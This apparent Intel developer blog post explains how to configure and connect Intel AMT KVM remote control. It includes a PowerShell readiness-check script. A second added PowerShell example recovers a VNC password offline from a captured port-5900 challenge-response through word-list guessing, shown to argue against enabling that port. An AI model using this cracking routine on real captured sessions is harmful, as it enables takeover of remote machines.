Creating a KVM connection
One of the most popular features of an Intel® vPro™ technology-based device is remote access via KVM (remote Keyboard, Video, Mouse). KVM allows remote control of a client even if the OS isn't running or if the system is asleep (AKA Out of Band). Traditional KVM requires additional hardware and software to reach a client system; the Intel vPro KVM feature provides KVM over IP with no additional equipment required.
The KVM feature was first introduced with Intel® Active Management Technology (Intel® AMT) 6.0 and has improved in each release, with higher supported screen resolutions and multiple monitor support. The specific capabilities of each Intel AMT version are listed on the supported screen resolution and multiple monitor support page of the SDK documentation.
Like all the other features of Intel AMT, the client must first be enabled and configured. The configuration process is discussed in a previous blog, "Intel vPro Setup and Configuration Integration". NOTE: Intel vPro-branded systems are the only Intel AMT clients that support the KVM feature. The "Standard Manageability" and "SMB" versions of Intel AMT do not include the KVM feature.
Additional Resources: KVM Features
Client Configuration
Additional Resources: Enable/Disable KVM Interface
While the KVM remote control feature can be configured as part of the AMT configuration process, the feature parameters can also be configured at a later time. It is best practice to run a script or application that checks and updates the KVM status before making a KVM connection to the client. The settings required for KVM to work are:
- The KVM Redirection Settings
- The MEBx Settings
- The KVM Redirection Listener
The KVM Redirection Settings are inspected by retrieving the instance of CIM_KVMRedirectionSAP and evaluating/setting the following property:
- CIM_KVMRedirectionSAP.EnabledState for 2 (Enabled) or 6 (Enabled but Offline, i.e. no session in progress); a value of 3 (Disabled) is changed by invoking RequestStateChange with RequestedState 2
The MEBx and Port Settings are validated by retrieving the instance of IPS_KVMRedirectionSettingData and evaluating/setting the following properties:
- IPS_KVMRedirectionSettingData.EnabledByMEBx for True (read-only over the network: if KVM is disabled in the MEBx menu it has to be enabled at the client itself)
- IPS_KVMRedirectionSettingData.Is5900PortEnabled, which opens the plain RFB port 5900; keep it False unless the caveats in the Making the Connection section are acceptable
The KVM Redirection Listener is validated by retrieving the instance of AMT_RedirectionService and evaluating/setting the following property:
- AMT_RedirectionService.ListenerEnabled property for True
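The pre-flight check described above, written as an added PowerShell example (this is not code from the original post or from the Intel AMT SDK). It uses PowerShell's built-in WS-Management cmdlets against the SDK's documented resource URIs. The function name, its parameters, the console-side WinRM client setup and the assumption that the firmware accepts the partial Put that Set-WSManInstance sends are mine; if your firmware rejects the Put, fall back to a Get, modify, Put of the whole instance as the SDK samples do.

```powershell
<#
 Added example, not from the original post or the Intel AMT SDK.
 Assumptions: a Digest admin user on the client; when -UseTls is not given, the WinRM
 client on the console must allow unencrypted Digest to a non-domain host, e.g.
   winrm set winrm/config/client '@{AllowUnencrypted="true"}'  plus a TrustedHosts entry.
 The Set-WSManInstance call assumes the firmware accepts the partial Put the cmdlet sends.
#>
function Test-AmtKvmReady {
    param(
        [Parameter(Mandatory)][string]$AmtHost,
        [Parameter(Mandatory)][pscredential]$Credential,
        [switch]$UseTls,    # WS-Man on 16993 instead of 16992
        [switch]$Repair     # enable the SAP and the listener instead of only reporting
    )
    $scheme = if ($UseTls) { 'https' } else { 'http' }
    $port   = if ($UseTls) { 16993 }   else { 16992 }
    $ws = @{ ConnectionURI  = "${scheme}://${AmtHost}:${port}/wsman"
             Authentication = 'Digest'
             Credential     = $Credential }

    $sapUri   = 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_KVMRedirectionSAP'
    $dataUri  = 'http://intel.com/wbem/wscim/1/ips-schema/1/IPS_KVMRedirectionSettingData'
    $redirUri = 'http://intel.com/wbem/wscim/1/amt-schema/1/AMT_RedirectionService'

    # All three classes are singletons on Intel AMT, so Enumerate yields exactly one instance each.
    $sap   = Get-WSManInstance @ws -ResourceURI $sapUri   -Enumerate
    $data  = Get-WSManInstance @ws -ResourceURI $dataUri  -Enumerate
    $redir = Get-WSManInstance @ws -ResourceURI $redirUri -Enumerate

    $problems = @()

    # 1. MEBx setting: read-only over the network. If false, KVM has to be enabled in the MEBx menu at the device.
    if ($data.EnabledByMEBx -ne 'true') { $problems += 'KVM is disabled in MEBx (cannot be fixed remotely)' }

    # 2. KVM SAP: EnabledState 2 = Enabled, 6 = Enabled but Offline (no session), 3 = Disabled.
    if ($sap.EnabledState -notin '2', '6') {
        if ($Repair) {
            Invoke-WSManAction @ws -ResourceURI $sapUri -Action RequestStateChange `
                -ValueSet @{ RequestedState = '2' } | Out-Null
        } else { $problems += "CIM_KVMRedirectionSAP.EnabledState is $($sap.EnabledState)" }
    }

    # 3. Redirection listener: without it nothing answers on 16994/16995.
    if ($redir.ListenerEnabled -ne 'true') {
        if ($Repair) {
            Set-WSManInstance @ws -ResourceURI $redirUri -ValueSet @{ ListenerEnabled = 'true' } | Out-Null
        } else { $problems += 'AMT_RedirectionService.ListenerEnabled is false' }
    }

    # 4. Port policy: port 5900 only offers VNC authentication and no TLS, so report it rather than silently close it.
    if ($data.Is5900PortEnabled -eq 'true') { $problems += 'Port 5900 (VNC auth, no TLS) is enabled' }

    # 5. Reachability of the redirection port the viewer will actually use.
    $rfbPort = if ($UseTls) { 16995 } else { 16994 }
    if (-not (Test-NetConnection -ComputerName $AmtHost -Port $rfbPort -InformationLevel Quiet)) {
        $problems += "TCP $rfbPort is not reachable from this console"
    }

    [pscustomobject]@{ Host = $AmtHost; Ready = ($problems.Count -eq 0); Problems = $problems }
}

# Usage (constructed address):
# Test-AmtKvmReady -AmtHost 192.0.2.10 -Credential (Get-Credential admin) -UseTls -Repair
```

Run it without -Repair first: it only reads and reports, which is what you want in a scheduled inventory job; -Repair is for the moment just before the technician launches the viewer.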
Making the Connection
Making an Intel AMT KVM connection involves a management system utilizing an application to communicate over a wired or wireless network directly to the client's Intel AMT firmware management ports. The ports utilized will determine the type of VNC viewer that must be used.
There are two general types of applications that can be used by the management system: HTTPS from a web browser or a VNC viewer.
The HTTPS option, as used by the open source project MeshCommander, has a web server make the connection to the client and displays the session within a web page.
VNC viewers come in many flavors, but they all connect to port 5900 by default. This is commonly referred to as the RFB (Remote Frame Buffer) port. Common VNC viewers speak either RFB version 3.8 (UltraVNC, TightVNC and RealVNC) or RFB 4.0 (RealVNC Plus, KVMview, MeshCommander). The RFB 3.8 protocol uses port 5900 exclusively.
Intel AMT KVM also uses ports other than 5900. The default Intel AMT port for authentication is 16992 and the redirection port is 16994. If you're using TLS, the authentication and redirection ports change to 16993 and 16995, respectively. When using the Intel AMT redirection ports, authentication is performed with the digest user or, optionally, with Kerberos, and the session can additionally be protected with TLS.
If you use a web-based management console, launch the viewer against the TLS redirection port (16995) and protect the console session itself with TLS as well, since the credentials and the KVM traffic otherwise cross the network in the clear.
Important note: Intel AMT KVM supports port 5900 to allow using standard free KVM viewers based on RFC 6143 that are available on the market. However, before enabling this port in Intel AMT, the administrator should consider the following:
► When using port 5900, the KVM viewer authenticates itself to Intel AMT using VNC authentication. The VNC authentication is based on a password that is validated using a challenge-response built on DES cryptography. As stated in RFC 6143 section 7.2.2: “This type of authentication is known to be cryptographically weak and is not intended for use on untrusted networks”. “Cryptographically weak” means that if an attacker manages to break it, they can extract the password from the challenge-response. In practice the password (at most eight bytes) is the DES key, and both the 16-byte challenge and the response travel in the clear, so anyone who captures one exchange can test candidate passwords offline until one reproduces the response; nothing in the protocol limits those attempts.
► TLS is not supported on port 5900.
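To make the "cryptographically weak" warning concrete, here is an added PowerShell example (not from the original post) that reproduces the RFC 6143 section 7.2.2 computation with the .NET DES class and then recovers a password from a single captured challenge/response pair by offline guessing. The challenge, the password and the word list are constructed for the demonstration; the bit-reversal of the key bytes is the quirk every real VNC implementation applies and is included so the responses match what a viewer on port 5900 would send.

```powershell
# Added example, not from the original post: why VNC authentication on port 5900 is weak.
# The server sends a 16-byte challenge; the client returns it DES-encrypted with the
# password as the key. Capture one exchange and the password can be attacked offline.

function ConvertTo-VncDesKey {
    param([string]$Password)
    # The password is truncated or zero-padded to 8 bytes. Real VNC implementations also
    # reverse the bit order of every key byte (a long-standing quirk), so do the same here.
    $key   = New-Object byte[] 8
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($Password)
    for ($i = 0; $i -lt [Math]::Min(8, $bytes.Length); $i++) {
        $r = 0
        for ($j = 0; $j -lt 8; $j++) { $r = ($r -shl 1) -bor (($bytes[$i] -shr $j) -band 1) }
        $key[$i] = [byte]$r
    }
    return ,$key
}

function Get-VncAuthResponse {
    param([string]$Password, [byte[]]$Challenge)
    $des = [System.Security.Cryptography.DES]::Create()
    $des.Mode    = [System.Security.Cryptography.CipherMode]::ECB
    $des.Padding = [System.Security.Cryptography.PaddingMode]::None
    $des.Key     = ConvertTo-VncDesKey $Password   # throws on DES weak keys, e.g. an empty password
    $response = $des.CreateEncryptor().TransformFinalBlock($Challenge, 0, $Challenge.Length)
    $des.Dispose()
    return ,$response
}

# --- what an on-path observer sees: one challenge and one response (constructed) -----
$challenge = [byte[]](0x3c,0xa1,0x77,0x09,0xe2,0x5b,0x90,0x14,0x6d,0xf8,0x22,0xb7,0x4e,0xc0,0x85,0x1f)
$captured  = Get-VncAuthResponse -Password 'Kvm2019!' -Challenge $challenge   # in reality, sniffed

# --- offline guessing: no further contact with the client is needed ------------------
$wordlist = 'password', 'admin', 'Intel123', 'Kvm2019!', 'vnc'   # a real attacker uses millions
foreach ($guess in $wordlist) {
    try   { $resp = Get-VncAuthResponse -Password $guess -Challenge $challenge }
    catch { continue }                                   # weak-key rejection: skip this guess
    if (($resp -join ',') -eq ($captured -join ',')) {
        "Recovered password: $guess"
        break
    }
}
```

The loop never talks to the client again, so Intel AMT's login throttling does not help; the only defenses are to leave Is5900PortEnabled false and use the redirection port with digest or Kerberos authentication over TLS.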
For additional information on integrating a KVM application into a Console, see the Intel KVM Application Developers Guide
Network Consideration
The network must be handled differently depending on whether the console and client share a 'local' corporate network or the connection crosses the open internet. On the local wired or wireless network, any properly configured client and VNC application combination can connect directly to the Intel AMT ports. A connection that originates outside that network must go through an Intel AMT proxy or a Management Presence Server (MPS).
Proxy Configuration
Additional Resource: Intel AMT KVM Proxy
The proxy application for Intel AMT KVM must be installed on the local network with the clients. It must have the correct port open for the VNC viewer application.
The basic flow for connection through a proxy is:
- The VNC client application viewer library directs the KVM Proxy to listen for KVM connections.
- The same library then opens an Intel KVM Remote Control connection to the Intel AMT Proxy listener.
- The VNC client application sends the Intel AMT platform connection/authentication data to the Intel AMT Proxy
- The Intel AMT proxy opens the connection to the Intel AMT platform with the provided settings to the required port (redirection or VNC port).
- The Proxy relays the Intel KVM data between the viewer library and the Intel AMT client.
Example of using the KVM Proxy Library API from within PowerShell
Additional resources and source code locations:
- Intel AMT SDK example application instructions for making the proxy connection
- Example source code: \Windows\Intel_AMT\Src\KVM\KVMProxy\
- Example source code: \Linux\Intel_AMT\Src\KVM\KVMProxy\
- Example source code for proxy connection library: kvmlib.dll
- Example Source Code: \Windows\Intel_AMT\Samples\KVM\KVMCustomTransportSample
Summary
Intel AMT KVM connections are a valuable resource for the technician. By allowing out-of-band communication they enlarge our tool set and reduce the need for desk-side visits, after a bit of setup of the clients and of our management console. As developers it is our task to enable our software to exercise Intel AMT features such as KVM.
To do that we need to configure the device, enable the KVM feature set and then set up the connection as needed by our users.
Other Resources
- Host Based Set-up and Configuration
- Setup and Configuration of Intel AMT
- Intel AMT Device Discovery
- Intel AMT Remote Power Management
- Intel AMT SDK Implementation and Reference Guide